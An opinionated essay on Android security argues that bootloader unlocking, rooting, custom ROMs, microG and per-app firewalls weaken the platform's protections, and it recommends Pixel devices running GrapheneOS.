Android by default has a strong security model with full system SELinux policies, strong app sandboxing, full verified boot, modern exploit mitigations like fine-grained forward-edge Control-Flow Integrity and ShadowCallStack, widespread use of memory-safe languages (Java) and more. This article talks about common ways people ruin the security model rather than criticisms of the security model itself.
Unlocking the bootloader in Android is a massive security risk. It disables verified boot, a fundamental part of the security
model. Verified boot ensures the integrity of the base system and boot chain to prevent malware persistence. If an
attacker has managed to compromise the entire system and gain extremely high privileges, verified boot will revert
their changes upon reboot and ensure they cannot persist.
Verified boot is not just for physical security as many people assume. Its main purpose is protection against remote attackers and the physical security is a nice side-effect.
Unlocking the bootloader is highly unrecommended.
Rooting your device allows an attacker to easily gain extremely high privileges. Android's architecture is built
upon principle of least privilege. By default,
unrestricted root is found nowhere in the system thanks to the
full system SELinux policy. Even the init system is not unrestricted
root. Exposing privileges far greater than any other part of the OS to the application layer is very silly.
It does not matter if you have to whitelist apps that have root. An attacker can fake user input by for example, clickjacking or they can exploit vulnerabilities in apps that you have granted root to.
People often try to argue that if root was insecure then why does Linux allow root. Linux does not have a security model like Android does. On the usual Linux system, gaining root is extremely easy.
The majority of custom ROMs ruin the security model by disabling verified boot, using userdebug builds, disabling SELinux, not including firmware updates, and a lot more. A common ROM that does many of these is LineageOS.
LineageOS uses userdebug builds
which adds tons of debugging tools as extra attack
surface, weakens SELinux polices and exposes root access via adb. LineageOS requires an unlocked bootloader
and disables verified boot which is essential to verify the integrity of the OS. It does not implement rollback
protection so an attacker can downgrade the OS to an old version and exploit already patched vulnerabilities (you
can tell as the updater allows you to downgrade versions). It does not include firmware updates which prevents you
from getting new patches to fix vulnerabilities. And there are plenty more issues.
LineageOS (and most other custom ROMs) are focused on customizing the device and not privacy/security.
MicroG is a common alternative to Google Play Services. Many people use this to get
rid of Google tracking on their device but many people do not realise that this substantially worsens security as it
requires signature spoofing
which allows apps to request to bypass signature verification.
Although, some signature spoofing implementations restrict it to make it less bad such as the one used by CalyxOS.
Firewalls such as AFWall+ or
Netguard are regularly used on Android to attempt to block network access from a specific app but these
do not reliably work. Apps can use IPC to bypass the restrictions. If you cut off network access to an app, it
will not prevent the app from sending an
intent to another app (such as the browser) to make it make the same connection.
Many apps already do this unintentionally with things such as with the download manager.
The most effective way to block network access is to run the app in its own profile so it cannot communicate with apps outside of the profile and revoke the
INTERNET permission from the app like
GrapheneOS allows you to do.
The best option for privacy/security on Android is to get a Pixel >=3 and flash
GrapheneOS. GrapheneOS does not contain any tracking unlike the stock OS on most devices and includes many
hardening enhancements such as a hardened memory allocator,
hardened C library,
hardened kernel, stricter SELinux policies
Pixels are also the best hardware to use as they have lots of hardening other devices lack such as full verified boot with support for custom keys, Titan M, hardened basebands, a good IOMMU to isolate hardware devices, fine-grained forward-edge kernel Control-Flow Integrity, kernel ShadowCallStack, etc.
Remember that GrapheneOS cannot prevent you from ruining your privacy yourself. You still have to be careful regardless of the operating system.